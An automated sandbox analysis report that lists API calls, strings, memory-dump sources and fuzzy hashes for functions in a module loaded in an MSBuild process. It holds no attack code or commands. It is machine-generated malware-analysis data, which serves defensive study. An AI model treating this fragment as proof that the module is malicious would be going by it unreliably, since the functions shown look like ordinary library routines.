LoadLibraryW.KERNEL32(wintrust.dll,?,6C4A7235), ref: 6C4D00D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C4D00F7
FreeLibrary.KERNEL32(?,6C4A7235), ref: 6C4D010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C4D00F1
wintrust.dll, xrefs: 6C4D00D3

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: d80ed21a476655f438492f5371b87b970bcb98c875bdc3182dd25bbe8530cff5
Instruction ID: e0ed372e249a1b76007982ffabf48433991c297779205a62741f48695ec27258
Opcode Fuzzy Hash: d80ed21a476655f438492f5371b87b970bcb98c875bdc3182dd25bbe8530cff5
Instruction Fuzzy Hash: 3EE012B0305305ABEF00AF298E0FF263AF9B742205F128219A90A82F00DBB19040CA18

Function 6C4D0080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C4A7204), ref: 6C4D0088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C4D00A7
FreeLibrary.KERNEL32(?,6C4A7204), ref: 6C4D00BE

Strings

CryptCATAdminAcquireContext2, xrefs: 6C4D00A1
wintrust.dll, xrefs: 6C4D0083

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: cd556203bb15dbee0c8938bb57cdc1a6a8ca319b56004cab6358b4e1997d51ff
Instruction ID: e34e5e93b3460ab3be7a164e612387b24a42817076c5a72eb6f2035edab02336
Opcode Fuzzy Hash: cd556203bb15dbee0c8938bb57cdc1a6a8ca319b56004cab6358b4e1997d51ff
Instruction Fuzzy Hash: 31E07EB4644705AAEF01BB66AC1EB027AF8A70B345F12831AE914D2F50DBB4D0549B19

Function 6C4D0170 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C4A7308), ref: 6C4D0178
GetProcAddress.KERNEL32(00000000,CryptCATCatalogInfoFromContext), ref: 6C4D0197
FreeLibrary.KERNEL32(?,6C4A7308), ref: 6C4D01AE

Strings

CryptCATCatalogInfoFromContext, xrefs: 6C4D0191
wintrust.dll, xrefs: 6C4D0173

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATCatalogInfoFromContext$wintrust.dll
API String ID: 145871493-3354427110
Opcode ID: 25f3ab2389d3566c138eabe3b9a9a63a006590f5022fe06b270a814fa3ac591c
Instruction ID: 39e6321ea42c2a144dd2cc30f38e82d2560747e8ee0aae560811b425c1c56321
Opcode Fuzzy Hash: 25f3ab2389d3566c138eabe3b9a9a63a006590f5022fe06b270a814fa3ac591c
Instruction Fuzzy Hash: 68E01AB0681200ABEF00AF29CD1EF453BF8B702249F120B1AE98182F40D7719080CA18

Function 6C4D0120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C4A7297), ref: 6C4D0128
GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6C4D0147
FreeLibrary.KERNEL32(?,6C4A7297), ref: 6C4D015E

Strings

CryptCATAdminEnumCatalogFromHash, xrefs: 6C4D0141
wintrust.dll, xrefs: 6C4D0123

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
API String ID: 145871493-1536241729
Opcode ID: 83d3423853894b6716565116fa9b5dee8d891e0b4b5198fa87c99aa9fe98d4d8
Instruction ID: c480a848bdd4b285fc542660074e271baf6f97fd4906ee7e2641b590070942b2
Opcode Fuzzy Hash: 83d3423853894b6716565116fa9b5dee8d891e0b4b5198fa87c99aa9fe98d4d8
Instruction Fuzzy Hash: 88E01AB1204244AFEF00BF2ACC1EF063AF8E703305F028219A905C2F00DB71D011CB28

Function 6C4D01C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C4A7266), ref: 6C4D01C8
GetProcAddress.KERNEL32(00000000,CryptCATAdminReleaseContext), ref: 6C4D01E7
FreeLibrary.KERNEL32(?,6C4A7266), ref: 6C4D01FE

Strings

wintrust.dll, xrefs: 6C4D01C3
CryptCATAdminReleaseContext, xrefs: 6C4D01E1

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminReleaseContext$wintrust.dll
API String ID: 145871493-1489773717
Opcode ID: 1c9200e2ca49c3da3da2540beed13a4b63bf5b43dcce0646237497e5094eaef6
Instruction ID: 6743310e7b2e1fc329c8b1e2cadf2654ec323997c8cdc199e14668d61bd47f8d
Opcode Fuzzy Hash: 1c9200e2ca49c3da3da2540beed13a4b63bf5b43dcce0646237497e5094eaef6
Instruction Fuzzy Hash: C9E075B5684785ABEF00AB668C1EF067AF8AB07345F12461AE905C2F50DB7190509B18

Function 6C4FC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C4FC0E9), ref: 6C4FC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C4FC437
FreeLibrary.KERNEL32(?,6C4FC0E9), ref: 6C4FC44C

Strings

NtQueryVirtualMemory, xrefs: 6C4FC431
ntdll.dll, xrefs: 6C4FC413

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: d648254e4096ec044fb574cc36f6af0c41ffe441f283765676d994d31bae03ca
Instruction ID: 841b9b119e1163b2ccf8846293acbc718ff1643060ce13687578b602daa95b0d
Opcode Fuzzy Hash: d648254e4096ec044fb574cc36f6af0c41ffe441f283765676d994d31bae03ca
Instruction Fuzzy Hash: 91E092B4605301ABEB00BB758D0EB117AF8A746209F024716AA08A1F10EBB0C012CA58

Function 6C4F75B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C4F748B,?), ref: 6C4F75B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C4F75D7
FreeLibrary.KERNEL32(?,6C4F748B,?), ref: 6C4F75EC

Strings

ntdll.dll, xrefs: 6C4F75B3
RtlNtStatusToDosError, xrefs: 6C4F75D1

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 158932512ff2fbaefeff2210055d85102d92250175209355700e86ecbcc008ad
Instruction ID: 493ca5dc15c985e729677e162ac922ba0225562224a106f88d15d9a2c764f2f8
Opcode Fuzzy Hash: 158932512ff2fbaefeff2210055d85102d92250175209355700e86ecbcc008ad
Instruction Fuzzy Hash: 67E0B6B1648301ABEF01AFA2DC8EF017AF8EB46329F125225E905D1F10EBB48052CF18

Function 6C4F7600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C4F7592), ref: 6C4F7608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C4F7627
FreeLibrary.KERNEL32(?,6C4F7592), ref: 6C4F763C

Strings

ntdll.dll, xrefs: 6C4F7603
NtUnmapViewOfSection, xrefs: 6C4F7621

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: 5e26d67a58d305b171a738c92df07e810f115a7a9eeeee6480ed679ebe8277ac
Instruction ID: bc52506bb21e516351aca6b52243f6895e9517201e9544ca26904aa1b43ce815
Opcode Fuzzy Hash: 5e26d67a58d305b171a738c92df07e810f115a7a9eeeee6480ed679ebe8277ac
Instruction Fuzzy Hash: 1BE092B0648741ABEF01AFA68C4EB0A7AB8E75A369F024316E909D1F10E7B480158B1C

Function 6C4FC1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C4FC1DE,?,00000000,?,00000000,?,6C4A779F), ref: 6C4FC1F8
GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6C4FC217
FreeLibrary.KERNEL32(?,6C4FC1DE,?,00000000,?,00000000,?,6C4A779F), ref: 6C4FC22C

Strings

WinVerifyTrust, xrefs: 6C4FC211
wintrust.dll, xrefs: 6C4FC1F3

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: WinVerifyTrust$wintrust.dll
API String ID: 145871493-2991032369
Opcode ID: 7a67e75eb70a7874ad123e0636a1acb957f704adf0ba69111d25c591926e8294
Instruction ID: 5902db50d9d39e04b699364069740f001783dcdcfb281904a4889d0b45dd970b
Opcode Fuzzy Hash: 7a67e75eb70a7874ad123e0636a1acb957f704adf0ba69111d25c591926e8294
Instruction Fuzzy Hash: 88E0B6B8605341ABEF00BF6ACD0EB027EF8AB46349F020715E908D1F11E7B48011CB59

Function 6C4FBE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6C4FBE49), ref: 6C4FBEC4
RtlCaptureStackBackTrace.NTDLL ref: 6C4FBEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C4FBE49), ref: 6C4FBF38
RtlReAllocateHeap.NTDLL ref: 6C4FBF83
RtlFreeHeap.NTDLL(6C4FBE49,00000000), ref: 6C4FBFA6

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: 65b8f269af39bcd1aba7d19b2f1607156576a33de3576de763660b853d5d7d31
Instruction ID: 07b5b087194efd89888f2dbf873a264fb8a7d02306c800425d06e13b1b51493f
Opcode Fuzzy Hash: 65b8f269af39bcd1aba7d19b2f1607156576a33de3576de763660b853d5d7d31
Instruction Fuzzy Hash: 52516D71A002068BE714DF69CD80FAAB3A2BFC9314F298629D565E7B54D730F9078B90

Function 6C4E8E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C4DB58D,?,?,?,?,?,?,?,6C50D734,?,?,?,6C50D734), ref: 6C4E8E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C4DB58D,?,?,?,?,?,?,?,6C50D734,?,?,?,6C50D734), ref: 6C4E8EBF
free.MOZGLUE(?,?,?,?,6C4DB58D,?,?,?,?,?,?,?,6C50D734,?,?,?), ref: 6C4E8F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C4DB58D,?,?,?,?,?,?,?,6C50D734,?,?,?,6C50D734), ref: 6C4E8F46
free.MOZGLUE(?,?,?,?,6C4DB58D,?,?,?,?,?,?,?,6C50D734,?,?,?), ref: 6C4E8F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C4DB58D,?,?,?,?,?,?,?,6C50D734,?,?,?), ref: 6C4E8F8F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 7b6f026d3b139ffcabc97de2028a5ae954dba046e730a66de42c2ab86dc5436d
Instruction ID: 8cdee8754fd1db564b4b680f8f0f3320d46039ad2697e361f4f12803711559a2
Opcode Fuzzy Hash: 7b6f026d3b139ffcabc97de2028a5ae954dba046e730a66de42c2ab86dc5436d
Instruction Fuzzy Hash: 8F5191B1A012168FEF15CF58D880F6EB3B2BF48319F16056AD516AB740E731F905CB91

Function 6C4A60E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C4A5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4A60F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C4A5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4A6180
free.MOZGLUE(?,?,?,?,6C4A5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4A6211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C4A5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4A6229
free.MOZGLUE(?,?,?,?,6C4A5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4A625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C4A5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C4A6271

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 0b6ad5ebc63ba8040c6ec4c1fb39e3a35f5869e31ac9d9ec2ad23afba7c780a3
Instruction ID: 0a3d7687fc7e2b45afa3cb499ad34493f4d5d1fb78488fdc43d564483bd84223
Opcode Fuzzy Hash: 0b6ad5ebc63ba8040c6ec4c1fb39e3a35f5869e31ac9d9ec2ad23afba7c780a3
Instruction Fuzzy Hash: 3A51ABB1A012068FEB00DFA8D880FAEBBB5EF15348F10043DC616D7B05E731AA16CB91

Function 6C4E27E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C4E2620,?,?,?,6C4D60AA,6C4D5FCB,6C4D79A3), ref: 6C4E284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C4E2620,?,?,?,6C4D60AA,6C4D5FCB,6C4D79A3), ref: 6C4E289A
free.MOZGLUE(?,?,?,6C4E2620,?,?,?,6C4D60AA,6C4D5FCB,6C4D79A3), ref: 6C4E28F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C4E2620,?,?,?,6C4D60AA,6C4D5FCB,6C4D79A3), ref: 6C4E2910
free.MOZGLUE(00000001,?,?,6C4E2620,?,?,?,6C4D60AA,6C4D5FCB,6C4D79A3), ref: 6C4E293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C4E2620,?,?,?,6C4D60AA,6C4D5FCB,6C4D79A3), ref: 6C4E294E

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: 2e5f765f1cb56f3dfad460d797e74e9c8373aec862ec8774e40067f30d962069
Instruction ID: 3942043f9e485658252e62fcb50d281138252f7f78fcffbbc9a4d6c0bdeb063d
Opcode Fuzzy Hash: 2e5f765f1cb56f3dfad460d797e74e9c8373aec862ec8774e40067f30d962069
Instruction Fuzzy Hash: 044171B1B002068FEB25CF68D888F6A77F6BB49309F160939D556EB740EB31E905CB51

Function 6C49CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C51E784), ref: 6C49CFF6
LeaveCriticalSection.KERNEL32(6C51E784), ref: 6C49D026
VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C49D06C
VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C49D139

Strings

MOZ_CRASH(), xrefs: 6C49D187

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalSectionVirtual$AllocEnterFreeLeave
String ID: MOZ_CRASH()
API String ID: 1090480015-2608361144
Opcode ID: ab22e3ba30728a76e0a6cad01cd30ca1864ddf189eb239d3557179536eec7938
Instruction ID: 2c3216bf8fbcb61c473d8e440f0ec562297b0c703f7be559e6cbd0953573c633
Opcode Fuzzy Hash: ab22e3ba30728a76e0a6cad01cd30ca1864ddf189eb239d3557179536eec7938
Instruction Fuzzy Hash: F9419372B012264FEB04CF6C8D9AF6A7BB4EB49714F160239E914E7F84D7A15C0187D9

Function 6C494DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C494E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C494E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C494EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C494F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C494F1E

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 1f52d2d392ba7bc9a4d4263a7cebe555a5129401f5aa55edc65e336e0251fd28
Instruction ID: f6d6fe09fe44d1ede9826a045f0aa911c8701984ed0650295b879c2c5a0dac4f
Opcode Fuzzy Hash: 1f52d2d392ba7bc9a4d4263a7cebe555a5129401f5aa55edc65e336e0251fd28
Instruction Fuzzy Hash: B041E0716047129FC705CF68C880E5BBBE4BF89394F109A1DF46687B41D730E918CB92

Function 6C4AC150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C4AC1BC
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4AC1DC

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Now@Stamp@mozilla@@TimeV12@_strlen
String ID:
API String ID: 1885715127-0
Opcode ID: 2c1ab70de1e19ab2df9bf40b60592ed0b55eae9ee2877f2c7f8bd6758b8c4909
Instruction ID: 02f7ab98ccdd2a915fe905d04e250f3f403d68a214549d3f72a515fc1c2c5472
Opcode Fuzzy Hash: 2c1ab70de1e19ab2df9bf40b60592ed0b55eae9ee2877f2c7f8bd6758b8c4909
Instruction Fuzzy Hash: A641B4B6D087408FD710DF68C880F9AB7E4AF95308F41855DE8989B712E731E549CBD2

Function 6C4FA820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C51F770), ref: 6C4FA858
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4FA87B

Part of subcall function 6C4FA9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C4FA88F,00000000), ref: 6C4FA9F1

_ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C4FA8FF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4FA90C
LeaveCriticalSection.KERNEL32(6C51F770), ref: 6C4FA97E

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
